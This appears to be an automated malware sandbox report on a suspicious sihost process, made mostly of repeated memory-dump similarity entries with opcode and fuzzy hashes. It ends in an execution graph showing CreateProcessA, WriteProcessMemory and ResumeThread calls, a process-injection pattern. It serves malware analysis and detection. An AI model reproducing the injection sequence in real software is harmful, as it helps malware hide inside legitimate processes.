                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 4322f660090fc743bfa09eaff4aa6de30cb389f6844fc11a1db31a08fd1a9584
                                      • Instruction ID: 1e6c88407494794dfd16f25503bccda6f040b5840510656383598cdbfa2f073a
                                      • Opcode Fuzzy Hash: 4322f660090fc743bfa09eaff4aa6de30cb389f6844fc11a1db31a08fd1a9584
                                      • Instruction Fuzzy Hash: B2C1E574E01218CFDB14DFA5C954BADBBB2BF89300F2090AAD409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ab1956c87302bfb8c0120127e02cf2fca8fa65e43e05381623b08056c2533ba0
                                      • Instruction ID: dae9553e2c138ce136a087510a9c90034323e233b2b1b4d56f555b9eb384eb47
                                      • Opcode Fuzzy Hash: ab1956c87302bfb8c0120127e02cf2fca8fa65e43e05381623b08056c2533ba0
                                      • Instruction Fuzzy Hash: 5BC1E574E00218CFDB14DFA5C894BADBBB2BF89300F2084A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: c0388e6b9bbaf6733020175b7b96bd5b4f2cb8bb7b4e3705dd60fda5dfd721dd
                                      • Instruction ID: 3f5d82717944e741670d45e87734d59707234d4c530b7ef696f7614795981b1a
                                      • Opcode Fuzzy Hash: c0388e6b9bbaf6733020175b7b96bd5b4f2cb8bb7b4e3705dd60fda5dfd721dd
                                      • Instruction Fuzzy Hash: BBC1D574E00218CFDB14DFA5C954BADBBB2BF89300F2495A9D409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 12c638a5d842d4098c54e0c29913b933ec910c681ac11f4769c46f6f4a61f7dc
                                      • Instruction ID: 11bd98ae103a1f8cfa67d1fba9ba79e4e54e8094aa2cb21d431b06ae30d5ddec
                                      • Opcode Fuzzy Hash: 12c638a5d842d4098c54e0c29913b933ec910c681ac11f4769c46f6f4a61f7dc
                                      • Instruction Fuzzy Hash: 09C1D574E01218CFDB54DFA5C994BADBBB2BF89300F2085A9D409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: dc360f8c9de6630bda941c979f19df95456dc9ed3e62e18c30c96082418ab325
                                      • Instruction ID: 9e1ef571a3a66ff8ceec6a8359837d1ffc021c3df72b15cfdb238bb597beaebc
                                      • Opcode Fuzzy Hash: dc360f8c9de6630bda941c979f19df95456dc9ed3e62e18c30c96082418ab325
                                      • Instruction Fuzzy Hash: 4EC1D574E00218CFDB54DFA5C895BADBBB2BF89300F2091A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a2d33e110b6da173586b2dfbda3c385b0faafd5b5de3334ddce4f1ae57c62328
                                      • Instruction ID: 8392e82ab57af860a465eaf7ae2a08c4f033f8de47af74ae2a4ac8fe9cc4e0c5
                                      • Opcode Fuzzy Hash: a2d33e110b6da173586b2dfbda3c385b0faafd5b5de3334ddce4f1ae57c62328
                                      • Instruction Fuzzy Hash: 96C1E574E00218CFDB14DFA5C894BADBBB2BF89300F2090A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d55f4a832016f59ae7fc6e3fd8e83cad26f9a46efe2964c5b15751aa4c78e26e
                                      • Instruction ID: e8fcdab744b8452866abcdc33836b7de394b5b13fcd8818bdac34db58ea6bf3d
                                      • Opcode Fuzzy Hash: d55f4a832016f59ae7fc6e3fd8e83cad26f9a46efe2964c5b15751aa4c78e26e
                                      • Instruction Fuzzy Hash: A5C1D574E00218CFDB14DFA5C994BADBBB2BF89300F2095A9D409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f9a7f38b5efec0de6731a2ddd441eaa0159cfb275dbb785a50b4afcd75d9b8b8
                                      • Instruction ID: 41a0d9172d39b511489dc99143524918c98ecce2452a3bd478167884c815becb
                                      • Opcode Fuzzy Hash: f9a7f38b5efec0de6731a2ddd441eaa0159cfb275dbb785a50b4afcd75d9b8b8
                                      • Instruction Fuzzy Hash: 55C1D474E00218CFDB14DFA5C995BADBBB2BF89300F2085AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 155d689eaaff059488736056a37f8e1612e8d133eefc744dd0f4918b3a9e3ad7
                                      • Instruction ID: 26a56eafc0c778f03294290f3a1c81c290563880de6e9ca9d8035994a2afe901
                                      • Opcode Fuzzy Hash: 155d689eaaff059488736056a37f8e1612e8d133eefc744dd0f4918b3a9e3ad7
                                      • Instruction Fuzzy Hash: B6C1E674E01218CFDB54DFA5C854BADBBB2BF89300F2085AAD809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8957e66be8ab065158285789f4d0bae7fd19b7050ad8aa193c4c0208f4f094f5
                                      • Instruction ID: ce4783a48317079832594cab396820eac16bf091b01d750826262fb6ba147873
                                      • Opcode Fuzzy Hash: 8957e66be8ab065158285789f4d0bae7fd19b7050ad8aa193c4c0208f4f094f5
                                      • Instruction Fuzzy Hash: 7BC1E574E00218CFDB54DFA5C994BADBBB2BF89300F2095A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ba96a30ccf3cdf8fe1b9b34821f46f17e055c140a7fb6ce4d13614ee9fde77f7
                                      • Instruction ID: 098848b2b276fb90e1e856b7cbcfd49771627ad60abbb44fdcbe6ab7bc71ff64
                                      • Opcode Fuzzy Hash: ba96a30ccf3cdf8fe1b9b34821f46f17e055c140a7fb6ce4d13614ee9fde77f7
                                      • Instruction Fuzzy Hash: 2AC1D574E01218CFDB14DFA5C854BADBBB2BF89300F2495A9D809AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 86475b5124b17753b2bc754c6e1dcbe830c269be35b0b85ef8adb7818026b937
                                      • Instruction ID: 65fdb34b629369f59a46d279b3791e37046272be5c7d12b68cb7decedf2aa492
                                      • Opcode Fuzzy Hash: 86475b5124b17753b2bc754c6e1dcbe830c269be35b0b85ef8adb7818026b937
                                      • Instruction Fuzzy Hash: 38C1E674E00218CFDB14DFA5C894BADBBB2BF89300F2094A9D409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: ad054746eb72b343fd5adfb05330df9f987067b5a36885f72dfb9f684cc6953d
                                      • Instruction ID: a7c9bc15906171b77c2441db0720ef267e2fb9d7fec0fbe3e7013040fbbf20c2
                                      • Opcode Fuzzy Hash: ad054746eb72b343fd5adfb05330df9f987067b5a36885f72dfb9f684cc6953d
                                      • Instruction Fuzzy Hash: 03C1E674E00218CFDB54DFA5C954BADBBB2BF89300F2085A9D409AB359DB355E85CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: e3389b618fe421197dedb2f1a15d2b363ddd00bd819131f43e365c2cc832a964
                                      • Instruction ID: 087d882372161875747b989843b9687751e813f6e01efbe5b3686364b6bf430b
                                      • Opcode Fuzzy Hash: e3389b618fe421197dedb2f1a15d2b363ddd00bd819131f43e365c2cc832a964
                                      • Instruction Fuzzy Hash: A5C1E674E00218CFDB54DFA5C995BADBBB2BF89300F2091A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 67ab4167f52148d10b532c8c1172f6372635cab923d83fb8123ffd7a6e32cbdc
                                      • Instruction ID: f1d44de81d1fadbe2cc5dae8c2602f160a1d5111c0f0a2130417f10248a8b4a6
                                      • Opcode Fuzzy Hash: 67ab4167f52148d10b532c8c1172f6372635cab923d83fb8123ffd7a6e32cbdc
                                      • Instruction Fuzzy Hash: 68C1D574E01218CFDB14DFA5C994BADBBB2BF89300F2085A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b19245ec7cf273df563264455a1194cf3c906c7b3d0d19c3f58010d2be1b5da5
                                      • Instruction ID: e3757cc665dd6fbc6a9678d1da10921f528763bbf006aeef7d88749096bb0489
                                      • Opcode Fuzzy Hash: b19245ec7cf273df563264455a1194cf3c906c7b3d0d19c3f58010d2be1b5da5
                                      • Instruction Fuzzy Hash: A9C1E674E01218CFDB54DFA5C894BADBBB2BF89300F2085AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: fc0a27219ccf1b7f318cd8194f691283751572e9594d9a6083abc5659299fb2f
                                      • Instruction ID: 67db47ef2f3c579208e3b21f2bc7c660548f97ac332dd7fd2f476dac63f8143f
                                      • Opcode Fuzzy Hash: fc0a27219ccf1b7f318cd8194f691283751572e9594d9a6083abc5659299fb2f
                                      • Instruction Fuzzy Hash: 37C1E574E00218CFDB14DFA5C994BADBBB2BF89300F2085AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: d1861bffe6e840b67f528811f9cf442871cd6e57af9feb808a3201c23ff4c86a
                                      • Instruction ID: 74decbd8bc00aeced23a418a4256fdae87b0dc99534f93031122c72a9a4c6a55
                                      • Opcode Fuzzy Hash: d1861bffe6e840b67f528811f9cf442871cd6e57af9feb808a3201c23ff4c86a
                                      • Instruction Fuzzy Hash: B4C1D574E00218CFDB54DFA5C954BADBBB2BF89300F2485A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: af72a8eb2b417d06e1f7dad7eb867f524a9b73597308c19643778096880a2fae
                                      • Instruction ID: 9e070c74a01bf5d537598c4912d65c79736cefcd5801df7e8e7fb7781c3845d2
                                      • Opcode Fuzzy Hash: af72a8eb2b417d06e1f7dad7eb867f524a9b73597308c19643778096880a2fae
                                      • Instruction Fuzzy Hash: 54C1E674E01218CFDB54DFA5C954BADBBB2BF89300F2085AAD809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f16f590f28ab6adefdab02c58264210d8893581e97b2796da3565af35388b4ef
                                      • Instruction ID: 537078e6357ec04443277130907ada8a79c11c28c683aa00c28412d249f307b5
                                      • Opcode Fuzzy Hash: f16f590f28ab6adefdab02c58264210d8893581e97b2796da3565af35388b4ef
                                      • Instruction Fuzzy Hash: 3BC1C374E00218CFDB14DFA5C994BADBBB2BF89300F2095A9D409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: fc60aebc1e5036d22bd6de47d7a50e4f16a2d4c1145687742c372f18d6e6a0d1
                                      • Instruction ID: e83967b2152470faf72f385a4727a19355e306f0c1c21b828df951abc31dafc7
                                      • Opcode Fuzzy Hash: fc60aebc1e5036d22bd6de47d7a50e4f16a2d4c1145687742c372f18d6e6a0d1
                                      • Instruction Fuzzy Hash: 02C1E674E00218CFDB14DFA5C854BADBBB2BF89300F2095A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2cd0b3ffe1438db3b3fd4c2a57f4551e606bc47be3ee35a3837bb6b922430d6a
                                      • Instruction ID: 09b6cac8ae0e670b7be9e4ce55e42ca55258934555e0329c8936360750efdef1
                                      • Opcode Fuzzy Hash: 2cd0b3ffe1438db3b3fd4c2a57f4551e606bc47be3ee35a3837bb6b922430d6a
                                      • Instruction Fuzzy Hash: DEC1D574E01218CFDB14DFA5C954BADBBB2BF89300F2095A9D409AB359DB359E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a57bf0fbe7eeb3eed6af24a8d7a66a277d4a8642fbe1163cc4dd6031969d206c
                                      • Instruction ID: e893f5527538b04b4d04e732c3af1ba7af986b8fce2dc607f24c3a78bceeb5a6
                                      • Opcode Fuzzy Hash: a57bf0fbe7eeb3eed6af24a8d7a66a277d4a8642fbe1163cc4dd6031969d206c
                                      • Instruction Fuzzy Hash: 46C1E574E00218CFDB54DFA5C994BADBBB2BF89300F2084AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 65aae63eb2a5f4d455f26d81848dc9ac9f5a2287290b90f280172430bb408ac2
                                      • Instruction ID: c7ceb60c3220e7d2d26b551acd0cc3e382e788d573eb13a94604663ba1d322bc
                                      • Opcode Fuzzy Hash: 65aae63eb2a5f4d455f26d81848dc9ac9f5a2287290b90f280172430bb408ac2
                                      • Instruction Fuzzy Hash: 0DC1E674E00218CFDB54DFA5C954BADBBB2BF89300F2085AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625507517.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_670000_sihost.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 132c24dd39ab4129394593d4a0b05575c322be1f649a68b4469615a4428b97e3
                                      • Instruction ID: f1f4c77cba505ca7246b4fa4c70db1745746e875fef66c43d568b8d649f53493
                                      • Opcode Fuzzy Hash: 132c24dd39ab4129394593d4a0b05575c322be1f649a68b4469615a4428b97e3
                                      • Instruction Fuzzy Hash: 0AC1D674E00218CFDB54DFA5C994BADBBB2BF89300F2095A9D809AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624693719.0000000000490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00490000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_490000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c32f9b816a7964cad63e3e75245edc1bc38abf435d8f909d4201e2ce29226fa
                                      • Instruction ID: 8237028e6e7c51acada117fa0e6211364117b5bacdc59462c0cda93e6fe31626
                                      • Opcode Fuzzy Hash: 4c32f9b816a7964cad63e3e75245edc1bc38abf435d8f909d4201e2ce29226fa
                                      • Instruction Fuzzy Hash: 2CC1D574E00218CFDB54DFA5C994BADBBB2BF89300F2091AAD409AB359DB355E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0e70209d92e7f45acc4ee40b6daea5c074167a90a5cbc37a0490142d9667d948
                                      • Instruction ID: 889e732d3255eb8e11929fa1412cfef36141858a26a95be30224506d468dcc70
                                      • Opcode Fuzzy Hash: 0e70209d92e7f45acc4ee40b6daea5c074167a90a5cbc37a0490142d9667d948
                                      • Instruction Fuzzy Hash: 27B19774E00218CFDB54DFA9D984A9DBBB2FF89314F2481A9D819AB365DB30AD41CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06863d7e2151ae9e4dac9de1bfe965ee99dc512a6bf65317f66ecc4aa4a12c0a
                                      • Instruction ID: 132f1f20629e2f871a3824929b511d83756229b7975ed51a31da3b684ceac295
                                      • Opcode Fuzzy Hash: 06863d7e2151ae9e4dac9de1bfe965ee99dc512a6bf65317f66ecc4aa4a12c0a
                                      • Instruction Fuzzy Hash: 3791F578900229CFDB29DF64DC51BA9BBB2BB48304F2095EAD80963359CF359E91CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a891d8c001b42db00888e003218ae3963d13b088cc46313fb53a0e3e34a2b117
                                      • Instruction ID: e03f9fb036b4ea9d86c6d897aaff6160a28908e886b6352c344f9b4a3ff73c9c
                                      • Opcode Fuzzy Hash: a891d8c001b42db00888e003218ae3963d13b088cc46313fb53a0e3e34a2b117
                                      • Instruction Fuzzy Hash: 79713B74E452888FCB05CFB9C995A9DBFF2BF9A300F1880AAD445AB356D7345842CF11
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f6edd9f400e4bf537660a573c4d27cd9fae08ab7d98f38ffd5129a6229f1aa66
                                      • Instruction ID: 5da8be99ce4bddbadb35dae25b7804856c3f024f500ae76ab0e3685c429b4c50
                                      • Opcode Fuzzy Hash: f6edd9f400e4bf537660a573c4d27cd9fae08ab7d98f38ffd5129a6229f1aa66
                                      • Instruction Fuzzy Hash: 91712A74E457888FCB04CFBAC995A9DBFF2AF99300F24806AD445AB366DB345842CF15
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.624335125.0000000000360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00360000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_360000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e1743f137f5e327e42254f39f9f38b2148523f17b349b19e20f4f0ebccfd6d0
                                      • Instruction ID: 0ba23f5763195b82780097681ed2f26b87e3727f685d3420b79cdfad39abfe1b
                                      • Opcode Fuzzy Hash: 9e1743f137f5e327e42254f39f9f38b2148523f17b349b19e20f4f0ebccfd6d0
                                      • Instruction Fuzzy Hash: 9251B274A01228DFCB65DF24D854BADB7B2BF4A301F6095EAD409A7354CB319E81CF50
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.625633522.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_9d0000_sihost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5ff24e2b979c8aa1268fce35102246ccc2ffaf48435d955867f981d668564c5e
                                      • Instruction ID: 5e618c3552cee92fcf1f23568f4354dde87c772c560d3afb0f217bcb5098a14e
                                      • Opcode Fuzzy Hash: 5ff24e2b979c8aa1268fce35102246ccc2ffaf48435d955867f981d668564c5e
                                      • Instruction Fuzzy Hash: 74D09E74E58358DACF10DFA8E8407ADB771BB45305F2028E6D108B3610D7319E508E56

                                      Execution Graph

                                      Execution Coverage:14.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:105
                                      Total number of Limit Nodes:5
                                      execution_graph 10952 a6a05c 10953 a6a05d 10952->10953 10957 a6bdd2 10953->10957 10972 a6bdd8 10953->10972 10954 a6a038 10958 a6bdd8 10957->10958 10967 a6bdfa 10958->10967 10987 a6c484 10958->10987 10992 a6c287 10958->10992 10997 a6c5ff 10958->10997 11001 a6c250 10958->11001 11006 a6cc52 10958->11006 11011 a6c4d5 10958->11011 11016 a6c888 10958->11016 11021 a6c1eb 10958->11021 11026 a6c8ae 10958->11026 11034 a6c781 10958->11034 11038 a6c4a0 10958->11038 11043 a6c3c2 10958->11043 10967->10954 10973 a6bdf2 10972->10973 10974 a6c287 2 API calls 10973->10974 10975 a6c484 2 API calls 10973->10975 10976 a6c3c2 2 API calls 10973->10976 10977 a6c4a0 2 API calls 10973->10977 10978 a6c781 2 API calls 10973->10978 10979 a6c8ae 4 API calls 10973->10979 10980 a6c1eb 2 API calls 10973->10980 10981 a6c888 2 API calls 10973->10981 10982 a6c4d5 2 API calls 10973->10982 10983 a6cc52 2 API calls 10973->10983 10984 a6c250 2 API calls 10973->10984 10985 a6c5ff 2 API calls 10973->10985 10986 a6bdfa 10973->10986 10974->10986 10975->10986 10976->10986 10977->10986 10978->10986 10979->10986 10980->10986 10981->10986 10982->10986 10983->10986 10984->10986 10985->10986 10986->10954 10988 a6c494 10987->10988 10989 a6c306 10988->10989 11048 a69130 10988->11048 11052 a69138 10988->11052 10989->10967 10993 a6c1ee 10992->10993 11056 a6980d 10993->11056 11060 a69818 10993->11060 11064 a69480 10997->11064 11068 a69478 10997->11068 10998 a6c306 10998->10967 11002 a6c1ee 11001->11002 11004 a6980d CreateProcessA 11002->11004 11005 a69818 CreateProcessA 11002->11005 11003 a6c2de 11003->10967 11004->11003 11005->11003 11072 a695e0 11006->11072 11076 a695d8 11006->11076 11007 a6cba1 11007->11006 11008 a6c306 11007->11008 11008->10967 11012 a6c494 11011->11012 11013 a6c306 11012->11013 11014 a69130 ResumeThread 11012->11014 11015 a69138 ResumeThread 11012->11015 11013->10967 11014->11012 11015->11012 11017 a6c804 11016->11017 11018 a6c306 11017->11018 11019 a69130 ResumeThread 11017->11019 11020 a69138 ResumeThread 11017->11020 11018->10967 11019->11017 11020->11017 11022 a6c1f8 11021->11022 11024 a6980d CreateProcessA 11022->11024 11025 a69818 CreateProcessA 11022->11025 11023 a6c2de 11023->10967 11024->11023 11025->11023 11027 a6c8bd 11026->11027 11080 a69220 11027->11080 11084 a69228 11027->11084 11028 a6c804 11029 a6c306 11028->11029 11030 a69130 ResumeThread 11028->11030 11031 a69138 ResumeThread 11028->11031 11029->10967 11030->11028 11031->11028 11088 a69350 11034->11088 11092 a69358 11034->11092 11035 a6c79f 11039 a6c4a9 11038->11039 11041 a69480 WriteProcessMemory 11039->11041 11042 a69478 WriteProcessMemory 11039->11042 11040 a6c6aa 11041->11040 11042->11040 11044 a6c3db 11043->11044 11046 a69480 WriteProcessMemory 11044->11046 11047 a69478 WriteProcessMemory 11044->11047 11045 a6c998 11046->11045 11047->11045 11049 a69138 ResumeThread 11048->11049 11051 a691ce 11049->11051 11051->10988 11053 a6917c ResumeThread 11052->11053 11055 a691ce 11053->11055 11055->10988 11057 a6989f CreateProcessA 11056->11057 11059 a69afd 11057->11059 11061 a6989f CreateProcessA 11060->11061 11063 a69afd 11061->11063 11065 a694cc WriteProcessMemory 11064->11065 11067 a6956b 11065->11067 11067->10998 11069 a69480 